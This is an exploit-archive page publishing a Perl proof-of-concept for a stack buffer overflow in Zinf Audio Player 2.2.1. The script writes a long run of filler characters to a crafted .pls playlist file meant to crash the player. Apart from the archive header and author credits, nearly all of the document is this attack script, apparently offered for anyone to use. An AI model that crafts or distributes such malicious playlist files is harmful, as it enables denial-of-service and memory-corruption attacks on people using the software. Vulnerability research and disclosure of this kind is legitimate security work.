[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC
# Published : 2009-01-27
# Author : Hakxer
# Previous Title : Amaya Web Editor XML and HTML parser Vulnerabilities
# Next Title : Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC


#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE)  Buffer Overflow PoC

my $chars="x90" x 2000;

open(MYFILE,'>>hakxer.pls');

print MYFILE $chars;

close(MYFILE);

print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";

# www.Syue.com [2009-01-27]